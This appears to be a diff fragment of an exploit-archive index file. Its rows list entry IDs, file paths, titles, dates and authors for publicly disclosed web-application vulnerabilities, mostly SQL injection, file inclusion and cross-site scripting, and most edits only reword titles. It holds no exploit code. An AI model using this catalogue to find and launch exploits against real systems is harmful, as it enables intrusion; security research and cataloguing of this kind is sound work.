5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - SQL Injection",2008-06-10,Unohope,php,webapps,0
|
||||
5775,platforms/asp/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' Parameter SQL Injection",2008-06-10,JosS,asp,webapps,0
|
||||
5776,platforms/php/webapps/5776.txt,"Experts 1.0.0 - 'answer.php' SQL Injection",2008-06-10,"CWH Underground",php,webapps,0
|
||||
5779,platforms/php/webapps/5779.txt,"SyndeoCMS 2.6.0 - Local File Inclusion / Cross-Site Scripting",2008-06-10,"CWH Underground",php,webapps,0
|
||||
5780,platforms/asp/webapps/5780.txt,"ASP Download 1.03 - Arbitrary Change Administrator Account",2008-06-10,Zigma,asp,webapps,0
|
||||
5781,platforms/asp/webapps/5781.txt,"Todd Woolums ASP News Management 2.2 - SQL Injection",2008-06-10,Bl@ckbe@rD,asp,webapps,0
|
||||
5782,platforms/php/webapps/5782.txt,"TNT Forum 0.9.4 - Local File Inclusion",2008-06-10,"CWH Underground",php,webapps,0
|
||||
5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - 'board' SQL Injection",2008-06-10,RMx,php,webapps,0
|
||||
5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - 'board' Parameter SQL Injection",2008-06-10,RMx,php,webapps,0
|
||||
5784,platforms/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusion",2008-06-11,"CWH Underground",php,webapps,0
|
||||
5785,platforms/php/webapps/5785.txt,"eFiction 3.0 - (toplists.php list) SQL Injection",2008-06-11,Mr.SQL,php,webapps,0
|
||||
5785,platforms/php/webapps/5785.txt,"eFiction 3.0 - 'toplists.php' SQL Injection",2008-06-11,Mr.SQL,php,webapps,0
|
||||
5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add Admin",2008-06-11,"CWH Underground",php,webapps,0
|
||||
5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps,0
|
||||
5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps,0
|
||||
|
@ -19039,7 +19046,7 @@ id,file,description,date,author,platform,type,port
|
|||
5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injections",2008-06-30,anonymous,php,webapps,0
|
||||
5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0
|
||||
5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0
|
||||
5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - (chatbox.php) SQL Injection",2008-06-30,DNX,php,webapps,0
|
||||
5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0
|
||||
5980,platforms/php/webapps/5980.txt,"Mambo Component 'com_n-gallery' - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
|
||||
5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
|
||||
5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
|
||||
|
@ -19369,7 +19376,7 @@ id,file,description,date,author,platform,type,port
|
|||
6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - (cat) SQL Injection",2008-09-12,r45c4l,php,webapps,0
|
||||
6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 - (register.php) Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps,0
|
||||
6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - 'cat_id' SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0
|
||||
6447,platforms/php/webapps/6447.txt,"pNews 2.03 - (newsid) SQL Injection",2008-09-12,r45c4l,php,webapps,0
|
||||
6447,platforms/php/webapps/6447.txt,"pNews 2.03 - 'newsid' Parameter SQL Injection",2008-09-12,r45c4l,php,webapps,0
|
||||
6448,platforms/php/webapps/6448.txt,"WebPortal CMS 0.7.4 - 'FCKeditor' Arbitrary File Upload",2008-09-12,S.W.A.T.,php,webapps,0
|
||||
6449,platforms/php/webapps/6449.php,"pLink 2.07 - (linkto.php id) Blind SQL Injection",2008-09-13,Stack,php,webapps,0
|
||||
6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0
|
||||
|
@ -19870,7 +19877,7 @@ id,file,description,date,author,platform,type,port
|
|||
7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-09,"Andreas Kurtz",jsp,webapps,0
|
||||
7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload) Multiple Vulnerabilities",2008-11-10,USH,php,webapps,0
|
||||
7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - (Tipo) Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0
|
||||
7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0
|
||||
7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - 'PostID' Parameter SQL Injection",2008-11-10,boom3rang,php,webapps,0
|
||||
7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0
|
||||
7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0
|
||||
7081,platforms/php/webapps/7081.txt,"AJ Article 1.0 - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0
|
||||
|
@ -20161,7 +20168,7 @@ id,file,description,date,author,platform,type,port
|
|||
7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
|
||||
7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0
|
||||
7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - (SQL Injection / Open Proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0
|
||||
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - (Authentication Bypass) SQL Injection",2008-12-14,Osirys,php,webapps,0
|
||||
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
|
||||
7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - (File Disclosure / Remote File Inclusion) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0
|
||||
7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
|
||||
7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - 'quote.mdb' Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
|
||||
|
@ -20457,7 +20464,7 @@ id,file,description,date,author,platform,type,port
|
|||
7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure",2009-01-25,Pouya_Server,php,webapps,0
|
||||
7866,platforms/php/webapps/7866.txt,"Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,php,webapps,0
|
||||
7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection",2009-01-26,fuzion,php,webapps,0
|
||||
7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0
|
||||
7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - Authentication Bypass / SQL Injection",2009-01-26,InjEctOr5,asp,webapps,0
|
||||
7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0
|
||||
7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0
|
||||
7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0
|
||||
|
@ -20882,7 +20889,7 @@ id,file,description,date,author,platform,type,port
|
|||
8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup",2009-05-08,TiGeR-Dz,php,webapps,0
|
||||
8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - (Authentication Bypass) SQL Injection",2009-05-08,"ThE g0bL!N",php,webapps,0
|
||||
8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - (Authentication Bypass) SQL Injection",2009-05-08,knxone,php,webapps,0
|
||||
8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - (uploadform.asp) Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0
|
||||
8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0
|
||||
8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0
|
||||
8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0
|
||||
8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0
|
||||
|
@ -21706,7 +21713,7 @@ id,file,description,date,author,platform,type,port
|
|||
10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0
|
||||
10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart - (prodid) SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0
|
||||
10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
10302,platforms/php/webapps/10302.txt,"427BB Fourtwosevenbb 2.3.2 - SQL Injection",2009-12-04,cr4wl3r,php,webapps,0
|
||||
10302,platforms/php/webapps/10302.txt,"427BB 2.3.2 - SQL Injection",2009-12-04,cr4wl3r,php,webapps,0
|
||||
10304,platforms/php/webapps/10304.txt,"Invision Power Board 3.0.4 / 3.0.4 / 2.3.6 - Local File Inclusion / SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0
|
||||
10305,platforms/php/webapps/10305.txt,"UBB.Threads 7.5.4 2 - Multiple File Inclusion",2009-12-04,R3VAN_BASTARD,php,webapps,0
|
||||
10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0
|
||||
|
@ -22941,7 +22948,7 @@ id,file,description,date,author,platform,type,port
|
|||
12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,cr4wl3r,php,webapps,0
|
||||
12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-26,cr4wl3r,php,webapps,0
|
||||
12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal - 'index.php' (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0
|
||||
12400,platforms/php/webapps/12400.txt,"Joomla! Component 'com_joomradio' - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0
|
||||
12400,platforms/php/webapps/12400.txt,"Joomla! Component JoomRadio 1.0 - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0
|
||||
12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup",2010-04-26,indoushka,php,webapps,0
|
||||
12407,platforms/php/webapps/12407.txt,"CMScout 2.08 - SQL Injection",2010-04-26,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload - SQL Injection",2010-04-26,BILGE_KAGAN,php,webapps,0
|
||||
|
@ -23879,7 +23886,7 @@ id,file,description,date,author,platform,type,port
|
|||
15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop - Multiple SQL Injections",2010-09-19,secret,php,webapps,0
|
||||
15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection",2010-09-19,BrOx-Dz,php,webapps,0
|
||||
15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 - Arbitrary File Upload",2010-09-19,Net.Edit0r,php,webapps,0
|
||||
15100,platforms/win_x86/webapps/15100.txt,"Joomla! Component 'com_elite_experts' - SQL Injection",2010-09-24,**RoAd_KiLlEr**,win_x86,webapps,80
|
||||
15100,platforms/win_x86/webapps/15100.txt,"Joomla! Component Elite Experts - SQL Injection",2010-09-24,**RoAd_KiLlEr**,win_x86,webapps,80
|
||||
15058,platforms/asp/webapps/15058.html,"VWD-CMS - Cross-Site Request Forgery",2010-09-20,Abysssec,asp,webapps,0
|
||||
15060,platforms/php/webapps/15060.txt,"LightNEasy CMS 3.2.1 - Blind SQL Injection",2010-09-20,Solidmedia,php,webapps,0
|
||||
15064,platforms/php/webapps/15064.txt,"primitive CMS 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps,0
|
||||
|
@ -24076,7 +24083,7 @@ id,file,description,date,author,platform,type,port
|
|||
15486,platforms/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injections",2010-11-10,"Salvatore Fresta",php,webapps,0
|
||||
15488,platforms/php/webapps/15488.txt,"Landesk - OS command Injection",2010-11-11,"Aureliano Calvo",php,webapps,0
|
||||
15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - eCal display.php (katid) SQL Injection",2010-11-11,"Vis Intelligendi",php,webapps,0
|
||||
15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - newsroom.asp SQL Injection",2010-11-12,Daikin,asp,webapps,0
|
||||
15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - 'newsroom.asp' SQL Injection",2010-11-12,Daikin,asp,webapps,0
|
||||
15500,platforms/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 - File Disclosure",2010-11-12,sfx,php,webapps,0
|
||||
15501,platforms/php/webapps/15501.txt,"Joomla! Component 'com_jsupport' - Cross-Site Scripting",2010-11-12,Valentin,php,webapps,0
|
||||
15502,platforms/php/webapps/15502.txt,"Joomla! Component 'com_jsupport' - SQL Injection",2010-11-12,Valentin,php,webapps,0
|
||||
|
@ -24784,7 +24791,7 @@ id,file,description,date,author,platform,type,port
|
|||
17679,platforms/php/webapps/17679.txt,"WordPress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
|
||||
17680,platforms/php/webapps/17680.txt,"WordPress Plugin Easy Contact Form Lite 1.0.7 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
|
||||
17681,platforms/php/webapps/17681.txt,"WordPress Plugin OdiHost NewsLetter 1.0 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
|
||||
17682,platforms/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 (catId) - Blind SQL Injection",2011-08-17,Penguin,php,webapps,0
|
||||
17682,platforms/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 - 'catId' Parameter Blind SQL Injection",2011-08-17,Penguin,php,webapps,0
|
||||
17683,platforms/php/webapps/17683.txt,"WordPress Plugin DS FAQ 1.3.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0
|
||||
17684,platforms/php/webapps/17684.txt,"WordPress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0
|
||||
17685,platforms/php/webapps/17685.txt,"Elgg 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps,0
|
||||
|
@ -25000,7 +25007,7 @@ id,file,description,date,author,platform,type,port
|
|||
18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 - 'do.php' CRLF Injection",2011-11-08,LiquidWorm,php,webapps,0
|
||||
18099,platforms/php/webapps/18099.txt,"osCSS2 - '_ID' Parameter Local file Inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0
|
||||
18100,platforms/php/webapps/18100.txt,"labwiki 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0
|
||||
18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0
|
||||
18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0
|
||||
18108,platforms/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution (Metasploit)",2011-11-13,Metasploit,php,webapps,0
|
||||
18110,platforms/php/webapps/18110.txt,"Mambo 4.x - 'Zorder' SQL Injection",2011-11-13,"KraL BeNiM",php,webapps,0
|
||||
18111,platforms/php/webapps/18111.php,"WordPress Plugin Zingiri 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0
|
||||
|
@ -25506,7 +25513,7 @@ id,file,description,date,author,platform,type,port
|
|||
20352,platforms/windows/webapps/20352.py,"afterlogic mailsuite pro (VMware Appliance) 6.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
|
||||
20353,platforms/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
|
||||
20356,platforms/windows/webapps/20356.py,"ManageEngine ServiceDesk Plus 8.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
|
||||
20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
|
||||
20357,platforms/windows/webapps/20357.py,"Alt-N MDaemon free 12.5.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
|
||||
20358,platforms/php/webapps/20358.py,"WordPress Plugin mini mail Dashboard widget 1.42 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0
|
||||
20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
|
||||
20360,platforms/php/webapps/20360.py,"WordPress Plugin postie 1.4.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0
|
||||
|
@ -26234,7 +26241,7 @@ id,file,description,date,author,platform,type,port
|
|||
22921,platforms/asp/webapps/22921.txt,".netCART Settings.XML - Information Disclosure",2003-07-16,G00db0y,asp,webapps,0
|
||||
22922,platforms/php/webapps/22922.txt,"Ultimate Bulletin Board 6.0/6.2 - UBBER Cookie HTML Injection",2003-07-16,anti_acid,php,webapps,0
|
||||
22925,platforms/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 - Settings.inc.php Full Path Disclosure",2003-07-17,Bosen,php,webapps,0
|
||||
22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 - PATH_SIMPNEWS Remote File Inclusion",2003-07-18,PUPET,php,webapps,0
|
||||
22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 - 'path_simpnews' Parameter Remote File Inclusion",2003-07-18,PUPET,php,webapps,0
|
||||
22929,platforms/php/webapps/22929.txt,"BuyClassifiedScript - PHP Code Injection",2012-11-26,d3b4g,php,webapps,0
|
||||
22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x - Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",php,webapps,0
|
||||
23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 - Subject Field HTML Injection",2003-08-11,G00db0y,php,webapps,0
|
||||
|
@ -27246,7 +27253,7 @@ id,file,description,date,author,platform,type,port
|
|||
25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - x-forwarded-for Script Injection",2005-03-01,FraMe,php,webapps,0
|
||||
25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0
|
||||
25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - DelPM.php Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0
|
||||
25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - auth.php Remote File Inclusion",2005-03-01,mozako,php,webapps,0
|
||||
25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - 'auth.php' Remote File Inclusion",2005-03-01,mozako,php,webapps,0
|
||||
25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 - BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,php,webapps,0
|
||||
25198,platforms/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps,0
|
||||
25199,platforms/php/webapps/25199.txt,"YaBB 2.0 - Remote UsersRecentPosts Cross-Site Scripting",2005-03-08,trueend5,php,webapps,0
|
||||
|
@ -27298,8 +27305,8 @@ id,file,description,date,author,platform,type,port
|
|||
25262,platforms/php/webapps/25262.txt,"Interspire ArticleLive 2005 - NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0
|
||||
25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 - msg.php Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0
|
||||
25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 - membres.php mt Parameter Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0
|
||||
25265,platforms/php/webapps/25265.txt,"PHPSysInfo 2.0/2.3 - 'index.php' sensor_program Parameter Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0
|
||||
25266,platforms/php/webapps/25266.txt,"PHPSysInfo 2.0/2.3 - system_footer.php Multiple Parameter Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0
|
||||
25265,platforms/php/webapps/25265.txt,"PHPSysInfo 2.0/2.3 - 'sensor_program' Parameter Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0
|
||||
25266,platforms/php/webapps/25266.txt,"PHPSysInfo 2.0/2.3 - 'system_footer.php' Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0
|
||||
25267,platforms/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 - HTML Injection",2005-03-23,"Woody Hughes",php,webapps,0
|
||||
25269,platforms/jsp/webapps/25269.txt,"Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,jsp,webapps,0
|
||||
25270,platforms/php/webapps/25270.txt,"Topic Calendar 1.0.1 - Calendar_Scheduler.php Cross-Site Scripting",2004-03-24,"Alberto Trivero",php,webapps,0
|
||||
|
@ -27824,7 +27831,7 @@ id,file,description,date,author,platform,type,port
|
|||
25963,platforms/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injections",2005-07-12,"Diabolic Crab",asp,webapps,0
|
||||
25964,platforms/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - Inc.login.php Privilege Escalation",2005-07-11,"Stefan Lochbihler",php,webapps,0
|
||||
25965,platforms/asp/webapps/25965.txt,"DVBBS 7.1 - ShowErr.asp Cross-Site Scripting",2005-07-12,rUnViRuS,asp,webapps,0
|
||||
25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0
|
||||
25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0
|
||||
25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0
|
||||
25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0
|
||||
25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - (tinybrowser.php folder Parameter) Directory Traversal",2013-06-05,expl0i13r,php,webapps,0
|
||||
|
@ -27851,7 +27858,7 @@ id,file,description,date,author,platform,type,port
|
|||
26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0
|
||||
26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
|
||||
26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 - Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
|
||||
26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - auth.php SQL Injection",2005-07-20,GHC,php,webapps,0
|
||||
26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,php,webapps,0
|
||||
26017,platforms/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 - Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",cgi,webapps,0
|
||||
26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 - Newsearch.php Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,php,webapps,0
|
||||
26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0
|
||||
|
@ -28284,10 +28291,10 @@ id,file,description,date,author,platform,type,port
|
|||
26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 - forum.php SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0
|
||||
26589,platforms/php/webapps/26589.txt,"OvBB 0.x - thread.php threadid Parameter SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0
|
||||
26590,platforms/php/webapps/26590.txt,"OvBB 0.x - profile.php userid Parameter SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0
|
||||
26591,platforms/php/webapps/26591.txt,"efiction 1.0/1.1/2.0 - titles.php let Parameter Cross-Site Scripting",2005-11-25,retrogod@aliceposta.it,php,webapps,0
|
||||
26592,platforms/php/webapps/26592.txt,"efiction 1.0/1.1/2.0 - titles.php let Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0
|
||||
26593,platforms/php/webapps/26593.txt,"efiction 1.0/1.1/2.0 - viewstory.php sid Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0
|
||||
26594,platforms/php/webapps/26594.txt,"efiction 1.0/1.1/2.0 - viewuser.php uid Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0
|
||||
26591,platforms/php/webapps/26591.txt,"efiction 1.0/1.1/2.0 - 'titles.php' Cross-Site Scripting",2005-11-25,retrogod@aliceposta.it,php,webapps,0
|
||||
26592,platforms/php/webapps/26592.txt,"efiction 1.0/1.1/2.0 - 'titles.php' SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0
|
||||
26593,platforms/php/webapps/26593.txt,"efiction 1.0/1.1/2.0 - 'sid' Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0
|
||||
26594,platforms/php/webapps/26594.txt,"efiction 1.0/1.1/2.0 - 'uid' Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0
|
||||
26595,platforms/php/webapps/26595.txt,"IsolSoft Support Center 2.2 - Multiple SQL Injections",2005-11-25,r0t3d3Vil,php,webapps,0
|
||||
26596,platforms/php/webapps/26596.txt,"AgileBill 1.4.92 - Product_Cat SQL Injection",2005-11-25,r0t,php,webapps,0
|
||||
26597,platforms/php/webapps/26597.txt,"PBLang Bulletin Board System 4.65 - Multiple HTML Injection Vulnerabilities",2005-11-26,r0xes,php,webapps,0
|
||||
|
@ -28676,7 +28683,7 @@ id,file,description,date,author,platform,type,port
|
|||
27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0
|
||||
27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0
|
||||
27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0
|
||||
27052,platforms/php/webapps/27052.txt,"427BB 2.2 - showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
